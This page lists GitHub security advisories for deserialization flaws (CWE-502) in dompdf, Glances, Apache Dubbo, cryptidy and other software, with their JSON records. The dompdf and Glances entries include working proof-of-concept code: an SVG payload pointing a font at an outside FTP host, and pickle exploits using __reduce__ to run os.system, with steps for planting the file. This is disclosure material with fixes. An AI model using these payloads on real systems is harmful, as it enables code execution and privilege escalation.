CWE-502
AllowedDeserialization of Untrusted Data
Abstraction: Base · Status: Draft
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
4800 vulnerabilities reference this CWE, most recent first.
GHSA-979P-7MRM-3C5W
Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-05-14 18:30Deserialization of Untrusted Data vulnerability in BdThemes Ultimate Store Kit Elementor Addons.This issue affects Ultimate Store Kit Elementor Addons: from n/a through 1.6.2.
{
"affected": [],
"aliases": [
"CVE-2024-4606"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T15:44:12Z",
"severity": "MODERATE"
},
"details": "Deserialization of Untrusted Data vulnerability in BdThemes Ultimate Store Kit Elementor Addons.This issue affects Ultimate Store Kit Elementor Addons: from n/a through 1.6.2.\n\n",
"id": "GHSA-979p-7mrm-3c5w",
"modified": "2024-05-14T18:30:55Z",
"published": "2024-05-14T18:30:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4606"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/ultimate-store-kit/wordpress-ultimate-store-kit-elementor-addons-woocommerce-builder-edd-builder-plugin-1-6-2-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-97GG-2M4J-JJ6Q
Vulnerability from github – Published: 2023-09-27 15:30 – Updated: 2024-04-04 07:54Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.
{
"affected": [],
"aliases": [
"CVE-2023-43291"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-27T15:19:33Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.",
"id": "GHSA-97gg-2m4j-jj6q",
"modified": "2024-04-04T07:54:45Z",
"published": "2023-09-27T15:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43291"
},
{
"type": "WEB",
"url": "https://gist.github.com/Dar1in9s/e3db6b04daacb68633a97581bbd5921b"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-97J9-4XHC-69QJ
Vulnerability from github – Published: 2026-04-24 00:31 – Updated: 2026-04-24 00:31Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.
{
"affected": [],
"aliases": [
"CVE-2026-33819"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-23T22:16:37Z",
"severity": "CRITICAL"
},
"details": "Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.",
"id": "GHSA-97j9-4xhc-69qj",
"modified": "2026-04-24T00:31:51Z",
"published": "2026-04-24T00:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33819"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33819"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-97M3-52WR-XVV2
Vulnerability from github – Published: 2024-02-22 18:15 – Updated: 2024-02-23 21:19Summary
A lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a file_exists call, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP < 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.
Details
The problem lies on the openFont function of the lib/Cpdf.php library, when the $font variable passed by php-svg-lib isn't checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS :
$name = basename($font);
$dir = dirname($font);
[...]
$metrics_name = "$name.ufm";
[...]
if (!isset($this->fonts[$font]) && file_exists("$dir/$metrics_name")) {
Passing a font named phar:///foo/bar/baz.phar/test will set the value of $name to test and $dir to phar:///foo/bar/baz.phar, which once reconstructed will call file_exists on phar:///foo/bar/baz.phar/test.ufm. That allows to deserialize the baz.phar arbitrary file that contains a test.ufm file in the archive.
PoC
Consider the following, minimal PHP code :
<?php
require('vendor/autoload.php');
use Dompdf\Dompdf;
$dompdf = new Dompdf();
$dompdf->loadHtml($_GET['payload']);
$dompdf->setPaper('A4', 'landscape');
$options = $dompdf->getOptions();
$options->setAllowedProtocols([]);
$dompdf->render();
$dompdf->stream();
With payload being this html file :
<html>
<img src="data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8c3ZnIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIj4NCiAgICA8dGV4dCB4PSIyMCIgeT0iMzUiIHN0eWxlPSJjb2xvcjpyZWQ7Zm9udC1mYW1pbHk6ZnRwOi8vYmxha2wuaXM6MjEveC95OyI+TXk8L3RleHQ+DQo8L3N2Zz4="></img>
</html>
with the base64 image being :
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<text x="20" y="35" style="color:red;font-family:ftp://blakl.is:21/x/y;">My</text>
</svg>
A connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.
Impact
An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phenx/php-svg-lib"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-22T18:15:41Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nA lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a `file_exists` call, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP \u003c 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.\n\n### Details\nThe problem lies on the `openFont` function of the `lib/Cpdf.php` library, when the `$font` variable passed by php-svg-lib isn\u0027t checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS : \n\n```\n$name = basename($font);\n$dir = dirname($font);\n[...]\n$metrics_name = \"$name.ufm\";\n[...]\n\nif (!isset($this-\u003efonts[$font]) \u0026\u0026 file_exists(\"$dir/$metrics_name\")) {\n```\n\nPassing a font named `phar:///foo/bar/baz.phar/test` will set the value of $name to `test` and $dir to `phar:///foo/bar/baz.phar`, which once reconstructed will call file_exists on `phar:///foo/bar/baz.phar/test.ufm`. That allows to deserialize the `baz.phar` arbitrary file that contains a `test.ufm` file in the archive.\n\n\n### PoC\n\nConsider the following, minimal PHP code : \n\n```\n\u003c?php\nrequire(\u0027vendor/autoload.php\u0027);\n\nuse Dompdf\\Dompdf;\n$dompdf = new Dompdf();\n$dompdf-\u003eloadHtml($_GET[\u0027payload\u0027]);\n$dompdf-\u003esetPaper(\u0027A4\u0027, \u0027landscape\u0027);\n$options = $dompdf-\u003egetOptions();\n$options-\u003esetAllowedProtocols([]);\n$dompdf-\u003erender();\n$dompdf-\u003estream();\n```\n\nWith payload being this html file : \n\n```\n\u003chtml\u003e\n\u003cimg src=\"data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8c3ZnIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIj4NCiAgICA8dGV4dCB4PSIyMCIgeT0iMzUiIHN0eWxlPSJjb2xvcjpyZWQ7Zm9udC1mYW1pbHk6ZnRwOi8vYmxha2wuaXM6MjEveC95OyI+TXk8L3RleHQ+DQo8L3N2Zz4=\"\u003e\u003c/img\u003e\n\u003c/html\u003e\n```\n\nwith the base64 image being : \n```\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?\u003e\n\u003csvg xmlns:svg=\"http://www.w3.org/2000/svg\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"200\" height=\"200\"\u003e\n \u003ctext x=\"20\" y=\"35\" style=\"color:red;font-family:ftp://blakl.is:21/x/y;\"\u003eMy\u003c/text\u003e\n\u003c/svg\u003e\n```\n\nA connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.\n\n### Impact\nAn attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.",
"id": "GHSA-97m3-52wr-xvv2",
"modified": "2024-02-23T21:19:15Z",
"published": "2024-02-22T18:15:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dompdf/dompdf/security/advisories/GHSA-97m3-52wr-xvv2"
},
{
"type": "WEB",
"url": "https://github.com/dompdf/php-svg-lib/security/advisories/GHSA-f3qr-qr4x-j273"
},
{
"type": "WEB",
"url": "https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa"
},
{
"type": "PACKAGE",
"url": "https://github.com/dompdf/dompdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Dompdf\u0027s usage of vulnerable version of phenx/php-svg-lib leads to restriction bypass and potential RCE"
}
GHSA-97Q7-CQC5-X5GJ
Vulnerability from github – Published: 2025-03-24 09:34 – Updated: 2025-03-24 09:34A vulnerability, which was classified as critical, was found in yiisoft Yii2 up to 2.0.39. This affects the function Generate of the file phpunit\src\Framework\MockObject\MockClass.php. The manipulation leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{
"affected": [],
"aliases": [
"CVE-2025-2690"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-24T08:15:12Z",
"severity": "MODERATE"
},
"details": "A vulnerability, which was classified as critical, was found in yiisoft Yii2 up to 2.0.39. This affects the function Generate of the file phpunit\\src\\Framework\\MockObject\\MockClass.php. The manipulation leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-97q7-cqc5-x5gj",
"modified": "2025-03-24T09:34:03Z",
"published": "2025-03-24T09:34:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2690"
},
{
"type": "WEB",
"url": "https://github.com/gaorenyusi/gaorenyusi/blob/main/Yii2-2.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.300711"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.300711"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.521718"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-97RV-88GF-PHVR
Vulnerability from github – Published: 2023-12-15 09:30 – Updated: 2025-02-13 19:28Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5.
Users are recommended to upgrade to the latest version, which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.dubbo:dubbo"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.5"
},
{
"fixed": "3.1.6"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.1.5"
]
}
],
"aliases": [
"CVE-2023-46279"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2023-12-15T23:25:04Z",
"nvd_published_at": "2023-12-15T09:15:07Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5.\n\nUsers are recommended to upgrade to the latest version, which fixes the issue.",
"id": "GHSA-97rv-88gf-phvr",
"modified": "2025-02-13T19:28:14Z",
"published": "2023-12-15T09:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46279"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/dubbo"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/zw53nxrkrfswmk9n3sfwxmcj7x030nmo"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Dubbo: Bypass deny serialize list check in Apache Dubbo"
}
GHSA-97W9-V595-3H5Q
Vulnerability from github – Published: 2025-10-31 09:30 – Updated: 2025-10-31 17:56cryptidy through 1.2.4 allows code execution via untrusted data because pickle.loads is used. This occurs in aes_decrypt_message in symmetric_encryption.py.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "cryptidy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.2.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-63675"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-31T17:56:11Z",
"nvd_published_at": "2025-10-31T07:15:38Z",
"severity": "MODERATE"
},
"details": "cryptidy through 1.2.4 allows code execution via untrusted data because pickle.loads is used. This occurs in aes_decrypt_message in symmetric_encryption.py.",
"id": "GHSA-97w9-v595-3h5q",
"modified": "2025-10-31T17:56:11Z",
"published": "2025-10-31T09:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63675"
},
{
"type": "WEB",
"url": "https://github.com/javiermorales36/cryptidy-analysis"
},
{
"type": "PACKAGE",
"url": "https://github.com/netinvent/cryptidy"
},
{
"type": "WEB",
"url": "https://github.com/netinvent/cryptidy/blob/cebc9ffd54cc20679d15a1a43ca9a5da645b0c58/cryptidy/symmetric_encryption.py#L220-L238"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "cryptidy allows code execution via untrusted data due to pickle.loads "
}
GHSA-9837-48HR-Q32J
Vulnerability from github – Published: 2026-06-22 21:21 – Updated: 2026-06-22 21:21Summary
glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path — through any of several realistic local or container-level scenarios — can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).
Details
Affected file: glances/outdated.py, method Outdated._load_cache(), line 121
Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121
# outdated.py (_load_cache, line 119-127)
try:
with open(self.cache_file, 'rb') as f:
cached_data = pickle.load(f) # ← no integrity check
except Exception as e:
logger.debug(f"Cannot read version from cache file: {self.cache_file} ({e})")
...
self.cache_file is constructed from the XDG cache directory path at Outdated.__init__():
# outdated.py (__init__)
self.cache_file = os.path.join(
user_cache_dir('glances')[0],
'glances-version.db'
)
On a default Linux installation this resolves to /home/john/.cache/glances/glances-version.db (or /root/.cache/glances/… when Glances runs as root).
Python's pickle module is an execution-capable serialisation format: any class that implements __reduce__ can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at pickle.load() time. There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.
The code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with os.system() via __reduce__ executed the injected shell command successfully before the surrounding Python code raised a TypeError.
PoC
Special configuration required
No non-default Glances configuration is needed. Version checking is enabled by default (check_update = true). The only pre condition is that the attacker can write to the Glances user's XDG cache directory — see the attack scenarios below for how this arises in practice.
Attack scenario A — local privilege escalation (shared multi-user host)
Prerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user's ~/.cache/glances/ directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).
Step 1 — Identify the cache path
python3 -c "from glances.config import user_cache_dir; print(user_cache_dir()[0])"
# Example output: /root/.cache/glances
Step 2 — Craft and plant a malicious pickle
import pickle, os, pathlib
class MaliciousPayload:
def __reduce__(self):
# This command runs as the Glances process user
cmd = 'id >> /tmp/glances_rce_proof.txt'
return (os.system, (cmd,))
cache_dir = pathlib.Path('/root/.cache/glances') # adjust to target
cache_file = cache_dir / 'glances-version.db'
cache_dir.mkdir(parents=True, exist_ok=True)
cache_file.write_bytes(pickle.dumps(MaliciousPayload()))
print(f'Payload written to {cache_file}')
Step 3 — Wait for Glances to start (or restart it)
Glances calls _load_cache() automatically at startup when check_update = true (the compiled-in default). No special configuration is required by the attacker.
Step 4 — Verify execution
cat /tmp/glances_rce_proof.txt
# uid=0(root) gid=0(root) groups=0(root) ← output from the Glances-user context
Attack scenario B — container / shared-volume poisoning
A compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.
Attack scenario C — symlink race (TOCTOU)
Before the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to ~/.cache/ can create a symlink:
mkdir -p /home/john/.cache
ln -s /tmp/attacker_controlled /home/john/.cache/glances
When Glances writes its legitimate cache file it writes instead to /tmp/attacker_controlled/glances-version.db, which the attacker can replace with the malicious pickle before the next start.
Minimal self-contained reproduction
import sys, os, pickle, pathlib, argparse
sys.path.insert(0, '/path/to/glances') # adjust to local clone
FAKE_CACHE = pathlib.Path('/tmp/glances_test_cache')
CACHE_FILE = FAKE_CACHE / 'glances-version.db'
FAKE_CACHE.mkdir(parents=True, exist_ok=True)
class Exploit:
def __reduce__(self):
return (os.system, ('echo RCE_confirmed >> /tmp/glances_rce.txt',))
CACHE_FILE.write_bytes(pickle.dumps(Exploit()))
# Reproduce the exact Glances code path
from glances.outdated import Outdated
obj = object.__new__(Outdated)
obj.args = argparse.Namespace(disable_check_update=False, time=2)
obj.data = {}
obj.cache_file = str(CACHE_FILE)
try:
obj._load_cache() # pickle.load() fires here
except Exception:
pass # expected: int not subscriptable
import time; time.sleep(0.2)
print(pathlib.Path('/tmp/glances_rce.txt').read_text())
# Prints: RCE_confirmed
Impact
Vulnerability type: Insecure Deserialization (CWE-502)
Who is impacted: Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user's XDG cache directory, or in any containerised deployment using shared volumes.
Impact: - Confidentiality: Full — the attacker gains code execution in the context of the Glances process and can read any data accessible to that user. - Integrity: Full — arbitrary commands can modify files, install persistence mechanisms, or alter system state. - Availability: Full — the Glances process and, if running as root, the system can be disrupted.
On many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.
Suggested Fix
Replace pickle with json for the version cache. The data stored is a simple Python dictionary containing two string values and a datetime object; a JSON representation is straightforward:
import json
from datetime import datetime
# Saving
with open(self.cache_file, 'w', encoding='utf-8') as f:
json.dump({
'installed_version': self.installed_version(),
'latest_version': latest,
'refresh_date': datetime.now().isoformat(),
}, f)
# Loading
with open(self.cache_file, 'r', encoding='utf-8') as f:
cached_data = json.load(f)
cached_data['refresh_date'] = datetime.fromisoformat(cached_data['refresh_date'])
If pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).
As an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46607"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:21:07Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`glances/outdated.py` uses `pickle.load()` to read a version-check cache file stored at a predictable, world-accessible path (`~/.cache/glances/glances-version.db` or `$XDG_CACHE_HOME/glances/glances-version.db`). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).\n\n---\n\n### Details\n\n**Affected file:** `glances/outdated.py`, method `Outdated._load_cache()`, line 121\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121\n\n```python\n# outdated.py (_load_cache, line 119-127)\ntry:\n with open(self.cache_file, \u0027rb\u0027) as f:\n cached_data = pickle.load(f) # \u2190 no integrity check\nexcept Exception as e:\n logger.debug(f\"Cannot read version from cache file: {self.cache_file} ({e})\")\n ...\n```\n\n`self.cache_file` is constructed from the XDG cache directory path at `Outdated.__init__()`:\n\n```python\n# outdated.py (__init__)\nself.cache_file = os.path.join(\n user_cache_dir(\u0027glances\u0027)[0],\n \u0027glances-version.db\u0027\n)\n```\n\nOn a default Linux installation this resolves to `/home/john/.cache/glances/glances-version.db` (or `/root/.cache/glances/\u2026` when Glances runs as root).\n\nPython\u0027s `pickle` module is an execution-capable serialisation format: any class that implements `__reduce__` can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at `pickle.load()` time. There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.\n\nThe code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with `os.system()` via `__reduce__` executed the injected shell command successfully before the surrounding Python code raised a `TypeError`.\n\n---\n\n### PoC\n\n**Special configuration required**\n\nNo non-default Glances configuration is needed. Version checking is enabled by default (`check_update = true`). The only pre condition is that the attacker can write to the Glances user\u0027s XDG cache directory \u2014 see the attack scenarios below for how this arises in practice.\n\n---\n\n**Attack scenario A \u2014 local privilege escalation (shared multi-user host)**\n\nPrerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user\u0027s `~/.cache/glances/` directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).\n\n**Step 1 \u2014 Identify the cache path**\n\n```bash\npython3 -c \"from glances.config import user_cache_dir; print(user_cache_dir()[0])\"\n# Example output: /root/.cache/glances\n```\n\n**Step 2 \u2014 Craft and plant a malicious pickle**\n\n```python\nimport pickle, os, pathlib\n\nclass MaliciousPayload:\n def __reduce__(self):\n # This command runs as the Glances process user\n cmd = \u0027id \u003e\u003e /tmp/glances_rce_proof.txt\u0027\n return (os.system, (cmd,))\n\ncache_dir = pathlib.Path(\u0027/root/.cache/glances\u0027) # adjust to target\ncache_file = cache_dir / \u0027glances-version.db\u0027\ncache_dir.mkdir(parents=True, exist_ok=True)\ncache_file.write_bytes(pickle.dumps(MaliciousPayload()))\nprint(f\u0027Payload written to {cache_file}\u0027)\n```\n\n**Step 3 \u2014 Wait for Glances to start (or restart it)**\n\nGlances calls `_load_cache()` automatically at startup when `check_update = true` (the compiled-in default). No special configuration is required by the attacker.\n\n**Step 4 \u2014 Verify execution**\n\n```bash\ncat /tmp/glances_rce_proof.txt\n# uid=0(root) gid=0(root) groups=0(root) \u2190 output from the Glances-user context\n```\n\n---\n\n**Attack scenario B \u2014 container / shared-volume poisoning**\n\nA compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.\n\n---\n\n**Attack scenario C \u2014 symlink race (TOCTOU)**\n\nBefore the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to `~/.cache/` can create a symlink:\n\n```bash\nmkdir -p /home/john/.cache\nln -s /tmp/attacker_controlled /home/john/.cache/glances\n```\n\nWhen Glances writes its legitimate cache file it writes instead to `/tmp/attacker_controlled/glances-version.db`, which the attacker can replace with the malicious pickle before the next start.\n\n---\n\n**Minimal self-contained reproduction**\n\n```python\nimport sys, os, pickle, pathlib, argparse\n\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\n\nFAKE_CACHE = pathlib.Path(\u0027/tmp/glances_test_cache\u0027)\nCACHE_FILE = FAKE_CACHE / \u0027glances-version.db\u0027\nFAKE_CACHE.mkdir(parents=True, exist_ok=True)\n\nclass Exploit:\n def __reduce__(self):\n return (os.system, (\u0027echo RCE_confirmed \u003e\u003e /tmp/glances_rce.txt\u0027,))\n\nCACHE_FILE.write_bytes(pickle.dumps(Exploit()))\n\n# Reproduce the exact Glances code path\nfrom glances.outdated import Outdated\nobj = object.__new__(Outdated)\nobj.args = argparse.Namespace(disable_check_update=False, time=2)\nobj.data = {}\nobj.cache_file = str(CACHE_FILE)\n\ntry:\n obj._load_cache() # pickle.load() fires here\nexcept Exception:\n pass # expected: int not subscriptable\n\nimport time; time.sleep(0.2)\nprint(pathlib.Path(\u0027/tmp/glances_rce.txt\u0027).read_text())\n# Prints: RCE_confirmed\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Insecure Deserialization (CWE-502)\n\n**Who is impacted:** Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user\u0027s XDG cache directory, or in any containerised deployment using shared volumes.\n\n**Impact:**\n- **Confidentiality:** Full \u2014 the attacker gains code execution in the context of the Glances process and can read any data accessible to that user.\n- **Integrity:** Full \u2014 arbitrary commands can modify files, install persistence mechanisms, or alter system state.\n- **Availability:** Full \u2014 the Glances process and, if running as root, the system can be disrupted.\n\nOn many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.\n\n---\n\n### Suggested Fix\n\nReplace `pickle` with `json` for the version cache. The data stored is a simple Python dictionary containing two string values and a `datetime` object; a JSON representation is straightforward:\n\n```python\nimport json\nfrom datetime import datetime\n\n# Saving\nwith open(self.cache_file, \u0027w\u0027, encoding=\u0027utf-8\u0027) as f:\n json.dump({\n \u0027installed_version\u0027: self.installed_version(),\n \u0027latest_version\u0027: latest,\n \u0027refresh_date\u0027: datetime.now().isoformat(),\n }, f)\n\n# Loading\nwith open(self.cache_file, \u0027r\u0027, encoding=\u0027utf-8\u0027) as f:\n cached_data = json.load(f)\n cached_data[\u0027refresh_date\u0027] = datetime.fromisoformat(cached_data[\u0027refresh_date\u0027])\n```\n\nIf pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).\n\nAs an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code 